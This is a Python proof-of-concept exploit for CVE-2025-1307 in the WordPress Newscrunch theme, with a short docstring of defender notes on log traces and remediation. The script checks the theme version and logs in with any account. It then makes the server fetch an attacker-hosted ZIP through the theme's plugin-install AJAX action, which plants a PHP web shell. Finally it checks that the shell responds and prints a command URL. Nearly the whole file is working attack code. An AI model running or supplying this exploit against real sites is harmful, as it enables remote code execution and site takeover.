"""Proof-of-concept client for CVE-2025-1307 in the WordPress Newscrunch theme.

Steps performed, in order:

1. Read ``/wp-content/themes/newscrunch/readme.txt`` and treat a
   ``Stable tag`` of 1.8.4 or lower as affected.
2. Download the ZIP at ``payload_url`` locally to learn the name of its
   first ``.php`` entry.
3. Log in through ``/wp-login.php`` with the supplied account.
4. POST ``plugin_url`` to
   ``/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin``.
5. Request the PHP file under ``/wp-content/plugins/``.

Review notes for defenders:

* Nothing in the script asks for an administrator account; any login that
  yields a ``wordpress_logged_in`` cookie is used. That suggests the AJAX
  handler does not check the caller's capability -- confirm against the
  vendor advisory.
* Traffic this flow leaves in web-server logs: a GET for the theme's
  ``readme.txt``, a POST to ``admin-ajax.php`` carrying the
  ``newscrunch_install_activate_plugin`` action and a ``plugin_url`` form
  field, then a GET for a ``.php`` file directly under
  ``/wp-content/plugins/`` (the script prints that URL with a ``cmd`` query
  parameter).
* Hiding ``readme.txt`` does not stop the attempt: when the version cannot
  be read the script carries on.
* Remediation is to move the theme to a release later than 1.8.4; review
  ``wp-content/plugins/`` for unexpected PHP files and review which
  accounts are able to log in.
* Every request is sent with ``verify=False``, so the WordPress credentials
  travel without certificate validation.
"""

import requests
import urllib3
import argparse
import time
import re
import zipfile
import io
from packaging import version

# All requests below disable certificate verification; this call only hides
# the warning urllib3 would print for each of them.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ASCII-art banner, reproduced exactly as the page shows it (flattened onto one line there).
BANNER = """ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@!! @@@ @@! @@@@ @@! !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! !@! @!@ !@! @!@!@ !@! !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@ @!@!!@ @!@ @! !@! @!! !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !@! !!@!@! !@!!! !!! !!! :!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !!: !!:! !!! !!: :!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!: ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: ::: :: :::: ::::::: :: :: :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : :: : : : : : : : : : Exploit by | Nxploit , Khaled_alenazi """


def get_filename_from_zip(payload_url):
    """Return the name of the first ``.php`` entry in the ZIP at *payload_url*.

    The archive is downloaded and inspected in memory by the machine running
    the script; the target is not contacted here. Returns ``None`` when no
    ``.php`` entry exists or when the download or parsing raises.
    """
    try:
        archive_bytes = requests.get(payload_url, verify=False, timeout=10).content
        with zipfile.ZipFile(io.BytesIO(archive_bytes), 'r') as archive:
            # Names come back in archive order; only the first match is used.
            return next(
                (entry for entry in archive.namelist() if entry.endswith(".php")),
                None,
            )
    except Exception as e:
        print(f"[-] Error extracting filename from ZIP: {e}")
        return None


def check_version(url):
    """Decide from the theme's ``readme.txt`` whether the run should continue.

    Returns ``False`` only when a ``Stable tag`` above 1.8.4 is read or the
    request itself fails. A missing file or a missing tag returns ``True``,
    so an unreadable version does not stop the run.
    """
    try:
        readme_url = f"{url}/wp-content/themes/newscrunch/readme.txt"
        reply = requests.get(readme_url, verify=False, timeout=10)

        if reply.status_code != 200:
            print("[-] Failed to fetch theme version. Proceeding anyway...")
            return True

        found = re.search(r"Stable tag:\s*([\d.]+)", reply.text)
        if not found:
            print("[-] Could not determine theme version. Proceeding anyway...")
            return True

        theme_version = found.group(1)
        print(f"[+] Newscrunch theme version detected: {theme_version}")

        # 1.8.4 is the highest release this script treats as affected.
        affected = version.parse(theme_version) <= version.parse("1.8.4")
        if not affected:
            print("[-] Target version is not vulnerable. Exiting.")
            return False

        print("[+] Exploitation is possible, proceeding...")
        return True
    except requests.RequestException as e:
        print(f"[-] Error checking version: {e}")
        return False


def login(url, username, password):
    """Authenticate against ``wp-login.php`` and return the session.

    Success is judged solely by a cookie whose name contains
    ``wordpress_logged_in``; the account's role is never inspected.
    Returns ``None`` on failed login or on a request error.
    """
    try:
        session = requests.Session()
        credentials = {
            'log': username,
            'pwd': password,
            'rememberme': 'forever',
            'wp-submit': 'Log+In',
        }
        print("[*] Logging in...")
        # verify=False: the credentials are posted without certificate validation.
        session.post(f"{url}/wp-login.php", verify=False, data=credentials, timeout=10)
        time.sleep(2)

        for cookie in session.cookies:
            if 'wordpress_logged_in' in cookie.name:
                print("[+] Logged in successfully.")
                return session

        print("[-] Failed to log in. Check credentials.")
        return None
    except requests.RequestException as e:
        print(f"[-] Error logging in: {e}")
        return None


def upload_and_extract(session, url, payload_url):
    """Send the ``newscrunch_install_activate_plugin`` AJAX request.

    The server receives an authenticated POST to ``admin-ajax.php`` with the
    action in the query string and a ``plugin_url`` form field. Presumably
    the theme then fetches and unpacks that URL server-side -- the handler is
    not shown here, so confirm against the theme source. Returns ``True``
    when the response body contains "success" (case-insensitive).
    """
    try:
        endpoint = f"{url}/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin"
        print("[*] Uploading and extracting payload...")
        reply = session.post(
            endpoint,
            verify=False,
            data={'plugin_url': payload_url},
            timeout=15,
        )
        time.sleep(3)

        if "success" not in reply.text.lower():
            print("[-] Exploit failed. Server response:")
            print(reply.text)
            return False

        print("[+] Exploit executed successfully. Malicious file uploaded.")
        return True
    except requests.RequestException as e:
        print(f"[-] Error during upload and extraction: {e}")
        return False


def exploit(url, username, password, payload_url):
    """Run the whole sequence and report whether the uploaded file answers.

    Stops silently at the first failing stage (each stage prints its own
    message). The final check only looks for HTTP 200 on the file's URL under
    ``/wp-content/plugins/``.
    """
    if not check_version(url):
        return

    shell_file = get_filename_from_zip(payload_url)
    if not shell_file:
        print("[-] Could not determine the shell filename. Exiting.")
        return

    session = login(url, username, password)
    if not session:
        return

    if not upload_and_extract(session, url, payload_url):
        return

    # The script assumes the archive's PHP entry lands directly under plugins/.
    shell_url = f"{url}/wp-content/plugins/{shell_file}"
    print(f"[*] Checking if shell is accessible: {shell_url}")
    time.sleep(2)

    try:
        status = session.get(shell_url, verify=False, timeout=10).status_code
    except requests.RequestException as e:
        print(f"[-] Error checking shell accessibility: {e}")
        return

    if status == 200:
        print(f"[+] Shell successfully uploaded and accessible: {shell_url}?cmd=ls")
    else:
        print("[-] Shell upload failed or blocked. Check manually.")


if __name__ == "__main__":
    print(BANNER)
    parser = argparse.ArgumentParser(description="Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi")

    # All four options are mandatory. The password is taken from the command
    # line, so it is visible in shell history and the process list.
    cli_options = (
        ('-u', '--url', "Target WordPress URL (e.g., https://example.com)"),
        ('-un', '--username', "WordPress username"),
        ('-p', '--password', "WordPress password"),
        ('-pl', '--payload_url', "Malicious file URL to upload"),
    )
    for short_flag, long_flag, help_text in cli_options:
        parser.add_argument(short_flag, long_flag, required=True, help=help_text)

    args = parser.parse_args()
    exploit(args.url, args.username, args.password, args.payload_url)